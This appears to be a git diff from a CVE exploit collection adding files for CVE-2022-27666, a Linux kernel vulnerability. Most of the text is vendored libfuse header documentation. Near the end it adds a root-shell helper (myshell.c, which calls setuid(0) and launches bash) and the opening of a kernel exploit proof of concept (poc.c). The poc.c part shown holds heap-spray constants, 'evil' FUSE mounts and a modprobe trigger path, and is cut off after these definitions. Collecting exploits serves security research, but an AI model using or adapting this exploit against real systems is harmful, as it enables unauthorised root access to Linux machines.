off_t off, int whence, + struct fuse_file_info *fi); +}; + +/** + * Reply with an error code or success. + * + * Possible requests: + * all except forget, forget_multi, retrieve_reply + * + * Wherever possible, error codes should be chosen from the list of + * documented error conditions in the corresponding system calls + * manpage. + * + * An error code of ENOSYS is sometimes treated specially. This is + * indicated in the documentation of the affected handler functions. + * + * The following requests may be answered with a zero error code: + * unlink, rmdir, rename, flush, release, fsync, fsyncdir, setxattr, + * removexattr, setlk. + * + * @param req request handle + * @param err the positive error value, or zero for success + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_err(fuse_req_t req, int err); + +/** + * Don't send reply + * + * Possible requests: + * forget + * forget_multi + * retrieve_reply + * + * @param req request handle + */ +void fuse_reply_none(fuse_req_t req); + +/** + * Reply with a directory entry + * + * Possible requests: + * lookup, mknod, mkdir, symlink, link + * + * Side effects: + * increments the lookup count on success + * + * @param req request handle + * @param e the entry parameters + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_entry(fuse_req_t req, const struct fuse_entry_param *e); + +/** + * Reply with a directory entry and open parameters + * + * currently the following members of 'fi' are used: + * fh, direct_io, keep_cache + * + * Possible requests: + * create + * + * Side effects: + * increments the lookup count on success + * + * @param req request handle + * @param e the entry parameters + * @param fi file information + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_create(fuse_req_t req, const struct fuse_entry_param *e, + const struct fuse_file_info *fi); + +/** + * Reply with attributes + * + * Possible requests: + * getattr, setattr + * + * @param req request handle + * @param attr the attributes + * @param attr_timeout validity timeout (in seconds) for the attributes + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_attr(fuse_req_t req, const struct stat *attr, + double attr_timeout); + +/** + * Reply with the contents of a symbolic link + * + * Possible requests: + * readlink + * + * @param req request handle + * @param link symbolic link contents + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_readlink(fuse_req_t req, const char *link); + +/** + * Reply with open parameters + * + * currently the following members of 'fi' are used: + * fh, direct_io, keep_cache + * + * Possible requests: + * open, opendir + * + * @param req request handle + * @param fi file information + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_open(fuse_req_t req, const struct fuse_file_info *fi); + +/** + * Reply with number of bytes written + * + * Possible requests: + * write + * + * @param req request handle + * @param count the number of bytes written + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_write(fuse_req_t req, size_t count); + +/** + * Reply with data + * + * Possible requests: + * read, readdir, getxattr, listxattr + * + * @param req request handle + * @param buf buffer containing data + * @param size the size of data in bytes + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_buf(fuse_req_t req, const char *buf, size_t size); + +/** + * Reply with data copied/moved from buffer(s) + * + * Zero copy data transfer ("splicing") will be used under + * the following circumstances: + * + * 1. FUSE_CAP_SPLICE_WRITE is set in fuse_conn_info.want, and + * 2. the kernel supports splicing from the fuse device + * (FUSE_CAP_SPLICE_WRITE is set in fuse_conn_info.capable), and + * 3. *flags* does not contain FUSE_BUF_NO_SPLICE + * 4. The amount of data that is provided in file-descriptor backed + * buffers (i.e., buffers for which bufv[n].flags == FUSE_BUF_FD) + * is at least twice the page size. + * + * In order for SPLICE_F_MOVE to be used, the following additional + * conditions have to be fulfilled: + * + * 1. FUSE_CAP_SPLICE_MOVE is set in fuse_conn_info.want, and + * 2. the kernel supports it (i.e, FUSE_CAP_SPLICE_MOVE is set in + fuse_conn_info.capable), and + * 3. *flags* contains FUSE_BUF_SPLICE_MOVE + * + * Note that, if splice is used, the data is actually spliced twice: + * once into a temporary pipe (to prepend header data), and then again + * into the kernel. If some of the provided buffers are memory-backed, + * the data in them is copied in step one and spliced in step two. + * + * The FUSE_BUF_SPLICE_FORCE_SPLICE and FUSE_BUF_SPLICE_NONBLOCK flags + * are silently ignored. + * + * Possible requests: + * read, readdir, getxattr, listxattr + * + * Side effects: + * when used to return data from a readdirplus() (but not readdir()) + * call, increments the lookup count of each returned entry by one + * on success. + * + * @param req request handle + * @param bufv buffer vector + * @param flags flags controlling the copy + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_data(fuse_req_t req, struct fuse_bufvec *bufv, + enum fuse_buf_copy_flags flags); + +/** + * Reply with data vector + * + * Possible requests: + * read, readdir, getxattr, listxattr + * + * @param req request handle + * @param iov the vector containing the data + * @param count the size of vector + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_iov(fuse_req_t req, const struct iovec *iov, int count); + +/** + * Reply with filesystem statistics + * + * Possible requests: + * statfs + * + * @param req request handle + * @param stbuf filesystem statistics + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_statfs(fuse_req_t req, const struct statvfs *stbuf); + +/** + * Reply with needed buffer size + * + * Possible requests: + * getxattr, listxattr + * + * @param req request handle + * @param count the buffer size needed in bytes + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_xattr(fuse_req_t req, size_t count); + +/** + * Reply with file lock information + * + * Possible requests: + * getlk + * + * @param req request handle + * @param lock the lock information + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_lock(fuse_req_t req, const struct flock *lock); + +/** + * Reply with block index + * + * Possible requests: + * bmap + * + * @param req request handle + * @param idx block index within device + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_bmap(fuse_req_t req, uint64_t idx); + +/* ----------------------------------------------------------- * + * Filling a buffer in readdir * + * ----------------------------------------------------------- */ + +/** + * Add a directory entry to the buffer + * + * Buffer needs to be large enough to hold the entry. If it's not, + * then the entry is not filled in but the size of the entry is still + * returned. The caller can check this by comparing the bufsize + * parameter with the returned entry size. If the entry size is + * larger than the buffer size, the operation failed. + * + * From the 'stbuf' argument the st_ino field and bits 12-15 of the + * st_mode field are used. The other fields are ignored. + * + * *off* should be any non-zero value that the filesystem can use to + * identify the current point in the directory stream. It does not + * need to be the actual physical position. A value of zero is + * reserved to mean "from the beginning", and should therefore never + * be used (the first call to fuse_add_direntry should be passed the + * offset of the second directory entry). + * + * @param req request handle + * @param buf the point where the new entry will be added to the buffer + * @param bufsize remaining size of the buffer + * @param name the name of the entry + * @param stbuf the file attributes + * @param off the offset of the next entry + * @return the space needed for the entry + */ +size_t fuse_add_direntry(fuse_req_t req, char *buf, size_t bufsize, + const char *name, const struct stat *stbuf, + off_t off); + +/** + * Add a directory entry to the buffer with the attributes + * + * See documentation of `fuse_add_direntry()` for more details. + * + * @param req request handle + * @param buf the point where the new entry will be added to the buffer + * @param bufsize remaining size of the buffer + * @param name the name of the entry + * @param e the directory entry + * @param off the offset of the next entry + * @return the space needed for the entry + */ +size_t fuse_add_direntry_plus(fuse_req_t req, char *buf, size_t bufsize, + const char *name, + const struct fuse_entry_param *e, off_t off); + +/** + * Reply to ask for data fetch and output buffer preparation. ioctl + * will be retried with the specified input data fetched and output + * buffer prepared. + * + * Possible requests: + * ioctl + * + * @param req request handle + * @param in_iov iovec specifying data to fetch from the caller + * @param in_count number of entries in in_iov + * @param out_iov iovec specifying addresses to write output to + * @param out_count number of entries in out_iov + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_ioctl_retry(fuse_req_t req, + const struct iovec *in_iov, size_t in_count, + const struct iovec *out_iov, size_t out_count); + +/** + * Reply to finish ioctl + * + * Possible requests: + * ioctl + * + * @param req request handle + * @param result result to be passed to the caller + * @param buf buffer containing output data + * @param size length of output data + */ +int fuse_reply_ioctl(fuse_req_t req, int result, const void *buf, size_t size); + +/** + * Reply to finish ioctl with iov buffer + * + * Possible requests: + * ioctl + * + * @param req request handle + * @param result result to be passed to the caller + * @param iov the vector containing the data + * @param count the size of vector + */ +int fuse_reply_ioctl_iov(fuse_req_t req, int result, const struct iovec *iov, + int count); + +/** + * Reply with poll result event mask + * + * @param req request handle + * @param revents poll result event mask + */ +int fuse_reply_poll(fuse_req_t req, unsigned revents); + +/** + * Reply with offset + * + * Possible requests: + * lseek + * + * @param req request handle + * @param off offset of next data or hole + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_lseek(fuse_req_t req, off_t off); + +/* ----------------------------------------------------------- * + * Notification * + * ----------------------------------------------------------- */ + +/** + * Notify IO readiness event + * + * For more information, please read comment for poll operation. + * + * @param ph poll handle to notify IO readiness event for + */ +int fuse_lowlevel_notify_poll(struct fuse_pollhandle *ph); + +/** + * Notify to invalidate cache for an inode. + * + * Added in FUSE protocol version 7.12. If the kernel does not support + * this (or a newer) version, the function will return -ENOSYS and do + * nothing. + * + * If the filesystem has writeback caching enabled, invalidating an + * inode will first trigger a writeback of all dirty pages. The call + * will block until all writeback requests have completed and the + * inode has been invalidated. It will, however, not wait for + * completion of pending writeback requests that have been issued + * before. + * + * If there are no dirty pages, this function will never block. + * + * @param se the session object + * @param ino the inode number + * @param off the offset in the inode where to start invalidating + * or negative to invalidate attributes only + * @param len the amount of cache to invalidate or 0 for all + * @return zero for success, -errno for failure + */ +int fuse_lowlevel_notify_inval_inode(struct fuse_session *se, fuse_ino_t ino, + off_t off, off_t len); + +/** + * Notify to invalidate parent attributes and the dentry matching + * parent/name + * + * To avoid a deadlock this function must not be called in the + * execution path of a related filesytem operation or within any code + * that could hold a lock that could be needed to execute such an + * operation. As of kernel 4.18, a "related operation" is a lookup(), + * symlink(), mknod(), mkdir(), unlink(), rename(), link() or create() + * request for the parent, and a setattr(), unlink(), rmdir(), + * rename(), setxattr(), removexattr(), readdir() or readdirplus() + * request for the inode itself. + * + * When called correctly, this function will never block. + * + * Added in FUSE protocol version 7.12. If the kernel does not support + * this (or a newer) version, the function will return -ENOSYS and do + * nothing. + * + * @param se the session object + * @param parent inode number + * @param name file name + * @param namelen strlen() of file name + * @return zero for success, -errno for failure + */ +int fuse_lowlevel_notify_inval_entry(struct fuse_session *se, fuse_ino_t parent, + const char *name, size_t namelen); + +/** + * This function behaves like fuse_lowlevel_notify_inval_entry() with + * the following additional effect (at least as of Linux kernel 4.8): + * + * If the provided *child* inode matches the inode that is currently + * associated with the cached dentry, and if there are any inotify + * watches registered for the dentry, then the watchers are informed + * that the dentry has been deleted. + * + * To avoid a deadlock this function must not be called while + * executing a related filesytem operation or while holding a lock + * that could be needed to execute such an operation (see the + * description of fuse_lowlevel_notify_inval_entry() for more + * details). + * + * When called correctly, this function will never block. + * + * Added in FUSE protocol version 7.18. If the kernel does not support + * this (or a newer) version, the function will return -ENOSYS and do + * nothing. + * + * @param se the session object + * @param parent inode number + * @param child inode number + * @param name file name + * @param namelen strlen() of file name + * @return zero for success, -errno for failure + */ +int fuse_lowlevel_notify_delete(struct fuse_session *se, + fuse_ino_t parent, fuse_ino_t child, + const char *name, size_t namelen); + +/** + * Store data to the kernel buffers + * + * Synchronously store data in the kernel buffers belonging to the + * given inode. The stored data is marked up-to-date (no read will be + * performed against it, unless it's invalidated or evicted from the + * cache). + * + * If the stored data overflows the current file size, then the size + * is extended, similarly to a write(2) on the filesystem. + * + * If this function returns an error, then the store wasn't fully + * completed, but it may have been partially completed. + * + * Added in FUSE protocol version 7.15. If the kernel does not support + * this (or a newer) version, the function will return -ENOSYS and do + * nothing. + * + * @param se the session object + * @param ino the inode number + * @param offset the starting offset into the file to store to + * @param bufv buffer vector + * @param flags flags controlling the copy + * @return zero for success, -errno for failure + */ +int fuse_lowlevel_notify_store(struct fuse_session *se, fuse_ino_t ino, + off_t offset, struct fuse_bufvec *bufv, + enum fuse_buf_copy_flags flags); +/** + * Retrieve data from the kernel buffers + * + * Retrieve data in the kernel buffers belonging to the given inode. + * If successful then the retrieve_reply() method will be called with + * the returned data. + * + * Only present pages are returned in the retrieve reply. Retrieving + * stops when it finds a non-present page and only data prior to that + * is returned. + * + * If this function returns an error, then the retrieve will not be + * completed and no reply will be sent. + * + * This function doesn't change the dirty state of pages in the kernel + * buffer. For dirty pages the write() method will be called + * regardless of having been retrieved previously. + * + * Added in FUSE protocol version 7.15. If the kernel does not support + * this (or a newer) version, the function will return -ENOSYS and do + * nothing. + * + * @param se the session object + * @param ino the inode number + * @param size the number of bytes to retrieve + * @param offset the starting offset into the file to retrieve from + * @param cookie user data to supply to the reply callback + * @return zero for success, -errno for failure + */ +int fuse_lowlevel_notify_retrieve(struct fuse_session *se, fuse_ino_t ino, + size_t size, off_t offset, void *cookie); + + +/* ----------------------------------------------------------- * + * Utility functions * + * ----------------------------------------------------------- */ + +/** + * Get the userdata from the request + * + * @param req request handle + * @return the user data passed to fuse_session_new() + */ +void *fuse_req_userdata(fuse_req_t req); + +/** + * Get the context from the request + * + * The pointer returned by this function will only be valid for the + * request's lifetime + * + * @param req request handle + * @return the context structure + */ +const struct fuse_ctx *fuse_req_ctx(fuse_req_t req); + +/** + * Get the current supplementary group IDs for the specified request + * + * Similar to the getgroups(2) system call, except the return value is + * always the total number of group IDs, even if it is larger than the + * specified size. + * + * The current fuse kernel module in linux (as of 2.6.30) doesn't pass + * the group list to userspace, hence this function needs to parse + * "/proc/$TID/task/$TID/status" to get the group IDs. + * + * This feature may not be supported on all operating systems. In + * such a case this function will return -ENOSYS. + * + * @param req request handle + * @param size size of given array + * @param list array of group IDs to be filled in + * @return the total number of supplementary group IDs or -errno on failure + */ +int fuse_req_getgroups(fuse_req_t req, int size, gid_t list[]); + +/** + * Callback function for an interrupt + * + * @param req interrupted request + * @param data user data + */ +typedef void (*fuse_interrupt_func_t)(fuse_req_t req, void *data); + +/** + * Register/unregister callback for an interrupt + * + * If an interrupt has already happened, then the callback function is + * called from within this function, hence it's not possible for + * interrupts to be lost. + * + * @param req request handle + * @param func the callback function or NULL for unregister + * @param data user data passed to the callback function + */ +void fuse_req_interrupt_func(fuse_req_t req, fuse_interrupt_func_t func, + void *data); + +/** + * Check if a request has already been interrupted + * + * @param req request handle + * @return 1 if the request has been interrupted, 0 otherwise + */ +int fuse_req_interrupted(fuse_req_t req); + + +/* ----------------------------------------------------------- * + * Inquiry functions * + * ----------------------------------------------------------- */ + +/** + * Print low-level version information to stdout. + */ +void fuse_lowlevel_version(void); + +/** + * Print available low-level options to stdout. This is not an + * exhaustive list, but includes only those options that may be of + * interest to an end-user of a file system. + */ +void fuse_lowlevel_help(void); + +/** + * Print available options for `fuse_parse_cmdline()`. + */ +void fuse_cmdline_help(void); + +/* ----------------------------------------------------------- * + * Filesystem setup & teardown * + * ----------------------------------------------------------- */ + +struct fuse_cmdline_opts { + int singlethread; + int foreground; + int debug; + int nodefault_subtype; + char *mountpoint; + int show_version; + int show_help; + int clone_fd; + unsigned int max_idle_threads; +}; + +/** + * Utility function to parse common options for simple file systems + * using the low-level API. A help text that describes the available + * options can be printed with `fuse_cmdline_help`. A single + * non-option argument is treated as the mountpoint. Multiple + * non-option arguments will result in an error. + * + * If neither -o subtype= or -o fsname= options are given, a new + * subtype option will be added and set to the basename of the program + * (the fsname will remain unset, and then defaults to "fuse"). + * + * Known options will be removed from *args*, unknown options will + * remain. + * + * @param args argument vector (input+output) + * @param opts output argument for parsed options + * @return 0 on success, -1 on failure + */ +int fuse_parse_cmdline(struct fuse_args *args, + struct fuse_cmdline_opts *opts); + +/** + * Create a low level session. + * + * Returns a session structure suitable for passing to + * fuse_session_mount() and fuse_session_loop(). + * + * This function accepts most file-system independent mount options + * (like context, nodev, ro - see mount(8)), as well as the general + * fuse mount options listed in mount.fuse(8) (e.g. -o allow_root and + * -o default_permissions, but not ``-o use_ino``). Instead of `-o + * debug`, debugging may also enabled with `-d` or `--debug`. + * + * If not all options are known, an error message is written to stderr + * and the function returns NULL. + * + * Option parsing skips argv[0], which is assumed to contain the + * program name. To prevent accidentally passing an option in + * argv[0], this element must always be present (even if no options + * are specified). It may be set to the empty string ('\0') if no + * reasonable value can be provided. + * + * @param args argument vector + * @param op the (low-level) filesystem operations + * @param op_size sizeof(struct fuse_lowlevel_ops) + * @param userdata user data + * + * @return the fuse session on success, NULL on failure + **/ +struct fuse_session *fuse_session_new(struct fuse_args *args, + const struct fuse_lowlevel_ops *op, + size_t op_size, void *userdata); + +/** + * Mount a FUSE file system. + * + * @param mountpoint the mount point path + * @param se session object + * + * @return 0 on success, -1 on failure. + **/ +int fuse_session_mount(struct fuse_session *se, const char *mountpoint); + +/** + * Enter a single threaded, blocking event loop. + * + * When the event loop terminates because the connection to the FUSE + * kernel module has been closed, this function returns zero. This + * happens when the filesystem is unmounted regularly (by the + * filesystem owner or root running the umount(8) or fusermount(1) + * command), or if connection is explicitly severed by writing ``1`` + * to the``abort`` file in ``/sys/fs/fuse/connections/NNN``. The only + * way to distinguish between these two conditions is to check if the + * filesystem is still mounted after the session loop returns. + * + * When some error occurs during request processing, the function + * returns a negated errno(3) value. + * + * If the loop has been terminated because of a signal handler + * installed by fuse_set_signal_handlers(), this function returns the + * (positive) signal value that triggered the exit. + * + * @param se the session + * @return 0, -errno, or a signal value + */ +int fuse_session_loop(struct fuse_session *se); + +#if FUSE_USE_VERSION < 32 +int fuse_session_loop_mt_31(struct fuse_session *se, int clone_fd); +#define fuse_session_loop_mt(se, clone_fd) fuse_session_loop_mt_31(se, clone_fd) +#else +#if (!defined(__UCLIBC__) && !defined(__APPLE__)) +/** + * Enter a multi-threaded event loop. + * + * For a description of the return value and the conditions when the + * event loop exits, refer to the documentation of + * fuse_session_loop(). + * + * @param se the session + * @param config session loop configuration + * @return see fuse_session_loop() + */ +int fuse_session_loop_mt(struct fuse_session *se, struct fuse_loop_config *config); +#else +int fuse_session_loop_mt_32(struct fuse_session *se, struct fuse_loop_config *config); +#define fuse_session_loop_mt(se, config) fuse_session_loop_mt_32(se, config) +#endif +#endif + +/** + * Flag a session as terminated. + * + * This function is invoked by the POSIX signal handlers, when + * registered using fuse_set_signal_handlers(). It will cause any + * running event loops to terminate on the next opportunity. + * + * @param se the session + */ +void fuse_session_exit(struct fuse_session *se); + +/** + * Reset the terminated flag of a session + * + * @param se the session + */ +void fuse_session_reset(struct fuse_session *se); + +/** + * Query the terminated flag of a session + * + * @param se the session + * @return 1 if exited, 0 if not exited + */ +int fuse_session_exited(struct fuse_session *se); + +/** + * Ensure that file system is unmounted. + * + * In regular operation, the file system is typically unmounted by the + * user calling umount(8) or fusermount(1), which then terminates the + * FUSE session loop. However, the session loop may also terminate as + * a result of an explicit call to fuse_session_exit() (e.g. by a + * signal handler installed by fuse_set_signal_handler()). In this + * case the filesystem remains mounted, but any attempt to access it + * will block (while the filesystem process is still running) or give + * an ESHUTDOWN error (after the filesystem process has terminated). + * + * If the communication channel with the FUSE kernel module is still + * open (i.e., if the session loop was terminated by an explicit call + * to fuse_session_exit()), this function will close it and unmount + * the filesystem. If the communication channel has been closed by the + * kernel, this method will do (almost) nothing. + * + * NOTE: The above semantics mean that if the connection to the kernel + * is terminated via the ``/sys/fs/fuse/connections/NNN/abort`` file, + * this method will *not* unmount the filesystem. + * + * @param se the session + */ +void fuse_session_unmount(struct fuse_session *se); + +/** + * Destroy a session + * + * @param se the session + */ +void fuse_session_destroy(struct fuse_session *se); + +/* ----------------------------------------------------------- * + * Custom event loop support * + * ----------------------------------------------------------- */ + +/** + * Return file descriptor for communication with kernel. + * + * The file selector can be used to integrate FUSE with a custom event + * loop. Whenever data is available for reading on the provided fd, + * the event loop should call `fuse_session_receive_buf` followed by + * `fuse_session_process_buf` to process the request. + * + * The returned file descriptor is valid until `fuse_session_unmount` + * is called. + * + * @param se the session + * @return a file descriptor + */ +int fuse_session_fd(struct fuse_session *se); + +/** + * Process a raw request supplied in a generic buffer + * + * The fuse_buf may contain a memory buffer or a pipe file descriptor. + * + * @param se the session + * @param buf the fuse_buf containing the request + */ +void fuse_session_process_buf(struct fuse_session *se, + const struct fuse_buf *buf); + +/** + * Read a raw request from the kernel into the supplied buffer. + * + * Depending on file system options, system capabilities, and request + * size the request is either read into a memory buffer or spliced + * into a temporary pipe. + * + * @param se the session + * @param buf the fuse_buf to store the request in + * @return the actual size of the raw request, or -errno on error + */ +int fuse_session_receive_buf(struct fuse_session *se, struct fuse_buf *buf); + +#ifdef __cplusplus +} +#endif + +#endif /* FUSE_LOWLEVEL_H_ */ diff --git a/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_opt.h b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_opt.h new file mode 100644 index 0000000000000000000000000000000000000000..d8573e74fddca0647c1c73051258c8da565f4834 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_opt.h @@ -0,0 +1,271 @@ +/* + FUSE: Filesystem in Userspace + Copyright (C) 2001-2007 Miklos Szeredi + + This program can be distributed under the terms of the GNU LGPLv2. + See the file COPYING.LIB. +*/ + +#ifndef FUSE_OPT_H_ +#define FUSE_OPT_H_ + +/** @file + * + * This file defines the option parsing interface of FUSE + */ + +#ifdef __cplusplus +extern "C" { +#endif + +/** + * Option description + * + * This structure describes a single option, and action associated + * with it, in case it matches. + * + * More than one such match may occur, in which case the action for + * each match is executed. + * + * There are three possible actions in case of a match: + * + * i) An integer (int or unsigned) variable determined by 'offset' is + * set to 'value' + * + * ii) The processing function is called, with 'value' as the key + * + * iii) An integer (any) or string (char *) variable determined by + * 'offset' is set to the value of an option parameter + * + * 'offset' should normally be either set to + * + * - 'offsetof(struct foo, member)' actions i) and iii) + * + * - -1 action ii) + * + * The 'offsetof()' macro is defined in the header. + * + * The template determines which options match, and also have an + * effect on the action. Normally the action is either i) or ii), but + * if a format is present in the template, then action iii) is + * performed. + * + * The types of templates are: + * + * 1) "-x", "-foo", "--foo", "--foo-bar", etc. These match only + * themselves. Invalid values are "--" and anything beginning + * with "-o" + * + * 2) "foo", "foo-bar", etc. These match "-ofoo", "-ofoo-bar" or + * the relevant option in a comma separated option list + * + * 3) "bar=", "--foo=", etc. These are variations of 1) and 2) + * which have a parameter + * + * 4) "bar=%s", "--foo=%lu", etc. Same matching as above but perform + * action iii). + * + * 5) "-x ", etc. Matches either "-xparam" or "-x param" as + * two separate arguments + * + * 6) "-x %s", etc. Combination of 4) and 5) + * + * If the format is "%s", memory is allocated for the string unlike with + * scanf(). The previous value (if non-NULL) stored at the this location is + * freed. + */ +struct fuse_opt { + /** Matching template and optional parameter formatting */ + const char *templ; + + /** + * Offset of variable within 'data' parameter of fuse_opt_parse() + * or -1 + */ + unsigned long offset; + + /** + * Value to set the variable to, or to be passed as 'key' to the + * processing function. Ignored if template has a format + */ + int value; +}; + +/** + * Key option. In case of a match, the processing function will be + * called with the specified key. + */ +#define FUSE_OPT_KEY(templ, key) { templ, -1U, key } + +/** + * Last option. An array of 'struct fuse_opt' must end with a NULL + * template value + */ +#define FUSE_OPT_END { NULL, 0, 0 } + +/** + * Argument list + */ +struct fuse_args { + /** Argument count */ + int argc; + + /** Argument vector. NULL terminated */ + char **argv; + + /** Is 'argv' allocated? */ + int allocated; +}; + +/** + * Initializer for 'struct fuse_args' + */ +#define FUSE_ARGS_INIT(argc, argv) { argc, argv, 0 } + +/** + * Key value passed to the processing function if an option did not + * match any template + */ +#define FUSE_OPT_KEY_OPT -1 + +/** + * Key value passed to the processing function for all non-options + * + * Non-options are the arguments beginning with a character other than + * '-' or all arguments after the special '--' option + */ +#define FUSE_OPT_KEY_NONOPT -2 + +/** + * Special key value for options to keep + * + * Argument is not passed to processing function, but behave as if the + * processing function returned 1 + */ +#define FUSE_OPT_KEY_KEEP -3 + +/** + * Special key value for options to discard + * + * Argument is not passed to processing function, but behave as if the + * processing function returned zero + */ +#define FUSE_OPT_KEY_DISCARD -4 + +/** + * Processing function + * + * This function is called if + * - option did not match any 'struct fuse_opt' + * - argument is a non-option + * - option did match and offset was set to -1 + * + * The 'arg' parameter will always contain the whole argument or + * option including the parameter if exists. A two-argument option + * ("-x foo") is always converted to single argument option of the + * form "-xfoo" before this function is called. + * + * Options of the form '-ofoo' are passed to this function without the + * '-o' prefix. + * + * The return value of this function determines whether this argument + * is to be inserted into the output argument vector, or discarded. + * + * @param data is the user data passed to the fuse_opt_parse() function + * @param arg is the whole argument or option + * @param key determines why the processing function was called + * @param outargs the current output argument list + * @return -1 on error, 0 if arg is to be discarded, 1 if arg should be kept + */ +typedef int (*fuse_opt_proc_t)(void *data, const char *arg, int key, + struct fuse_args *outargs); + +/** + * Option parsing function + * + * If 'args' was returned from a previous call to fuse_opt_parse() or + * it was constructed from + * + * A NULL 'args' is equivalent to an empty argument vector + * + * A NULL 'opts' is equivalent to an 'opts' array containing a single + * end marker + * + * A NULL 'proc' is equivalent to a processing function always + * returning '1' + * + * @param args is the input and output argument list + * @param data is the user data + * @param opts is the option description array + * @param proc is the processing function + * @return -1 on error, 0 on success + */ +int fuse_opt_parse(struct fuse_args *args, void *data, + const struct fuse_opt opts[], fuse_opt_proc_t proc); + +/** + * Add an option to a comma separated option list + * + * @param opts is a pointer to an option list, may point to a NULL value + * @param opt is the option to add + * @return -1 on allocation error, 0 on success + */ +int fuse_opt_add_opt(char **opts, const char *opt); + +/** + * Add an option, escaping commas, to a comma separated option list + * + * @param opts is a pointer to an option list, may point to a NULL value + * @param opt is the option to add + * @return -1 on allocation error, 0 on success + */ +int fuse_opt_add_opt_escaped(char **opts, const char *opt); + +/** + * Add an argument to a NULL terminated argument vector + * + * @param args is the structure containing the current argument list + * @param arg is the new argument to add + * @return -1 on allocation error, 0 on success + */ +int fuse_opt_add_arg(struct fuse_args *args, const char *arg); + +/** + * Add an argument at the specified position in a NULL terminated + * argument vector + * + * Adds the argument to the N-th position. This is useful for adding + * options at the beginning of the array which must not come after the + * special '--' option. + * + * @param args is the structure containing the current argument list + * @param pos is the position at which to add the argument + * @param arg is the new argument to add + * @return -1 on allocation error, 0 on success + */ +int fuse_opt_insert_arg(struct fuse_args *args, int pos, const char *arg); + +/** + * Free the contents of argument list + * + * The structure itself is not freed + * + * @param args is the structure containing the argument list + */ +void fuse_opt_free_args(struct fuse_args *args); + + +/** + * Check if an option matches + * + * @param opts is the option description array + * @param opt is the option to match + * @return 1 if a match is found, 0 if not + */ +int fuse_opt_match(const struct fuse_opt opts[], const char *opt); + +#ifdef __cplusplus +} +#endif + +#endif /* FUSE_OPT_H_ */ diff --git a/cve/linux-kernel/2022/CVE-2022-27666/libfuse/meson.build b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/meson.build new file mode 100644 index 0000000000000000000000000000000000000000..bf671977a5a6a9142bd67aceabd8a919e3d968d0 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/meson.build @@ -0,0 +1,4 @@ +libfuse_headers = [ 'fuse.h', 'fuse_common.h', 'fuse_lowlevel.h', + 'fuse_opt.h', 'cuse_lowlevel.h', 'fuse_log.h' ] + +install_headers(libfuse_headers, subdir: 'fuse3') diff --git a/cve/linux-kernel/2022/CVE-2022-27666/libfuse3.a b/cve/linux-kernel/2022/CVE-2022-27666/libfuse3.a new file mode 100644 index 0000000000000000000000000000000000000000..81aa0a40f969584d486cdaac87e33918a910be24 Binary files /dev/null and b/cve/linux-kernel/2022/CVE-2022-27666/libfuse3.a differ diff --git a/cve/linux-kernel/2022/CVE-2022-27666/myshell.c b/cve/linux-kernel/2022/CVE-2022-27666/myshell.c new file mode 100644 index 0000000000000000000000000000000000000000..6151e43dc0235dc9addabdc8dd0df210ff225757 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/myshell.c @@ -0,0 +1,6 @@ +#include + +int main() { + setuid(0); + system("/bin/bash"); +} \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-27666/poc.c b/cve/linux-kernel/2022/CVE-2022-27666/poc.c new file mode 100644 index 0000000000000000000000000000000000000000..b0582f6ddb3cf5e3ec099bfa51df5f6b0a6bede5 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/poc.c @@ -0,0 +1,2215 @@ + + +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include + +#include "fuse_evil.h" +#define SIOCETHTOOL 0x8946 +#define SLAB_32_OBJS_PER_SLAB 64 +#define SLAB_32_CPU_PARTIAL 30 +#define SLAB_1k_OBJS_PER_SLAB 32 +#define SLAB_1k_CPU_PARTIAL 6 +#define SLAB_2k_OBJS_PER_SLAB 16 +#define SLAB_2k_CPU_PARTIAL 6 +#define SLAB_4k_OBJS_PER_SLAB 8 +#define SLAB_4k_CPU_PARTIAL 2 +#define SIZE_OF_MSG_MSG 48 +#define SIZE_OF_MSG_MSGSEG 8 +#define OOB_PAGE 0xf +#define PAGE_SIZE 0x1000 +#define TTY_NUM 32 +#define LAST_PAGE_GAP_BYTES 0x88 +#define MSG_LEN 0x1018 + + +#define CLEAR_LIST 0 +#define PRINT_STACK_DEBUG 1 +#define PRINT_PAGE_ALLOC 1 << 1 +#define PRINT_PAGE_FREE 1 << 2 +#define PRINT_MSG 1 << 3 +#define PRINT_USER_KEY_PAYLOAD 1 << 4 +#define PRINT_OOB_INFO 1 << 5 +#define PRINT_ANY_PROC 1 << 6 +#define PRINT_PAGE_CUR_ORDER 1 << 7 +#define PRINT_PAGE_FREE_DETAIL 1 << 8 +#define PRINT_XATTR 1 << 9 +#define PRINT_OOB_DETAIL 1 << 10 +#define PRINT_TARGET_SLAB 1 << 11 +#define PRINT_MSG_DETAIL 1 << 12 + +#define SIZE_OF_USER_KEY_PAYLOAD 2049 +#define SIZE_OF_USER_KEY_PAYLOAD_SLAB 4096 + +#define HEAP_SPRAY_LOOP 2 +#define N_PROCS 8 +#define N_LOOP N_PROCS +#define FUSE_MOUNT1 "evil1" +#define FUSE_MOUNT2 "evil2" +#define PROC_MODPROBE_TRIGGER "/tmp/modprobe_trigger" + +#define MAX_QBYTES_IN_QUEUE 1024 +#define BASE_MSGTYPE 0x1 +#define 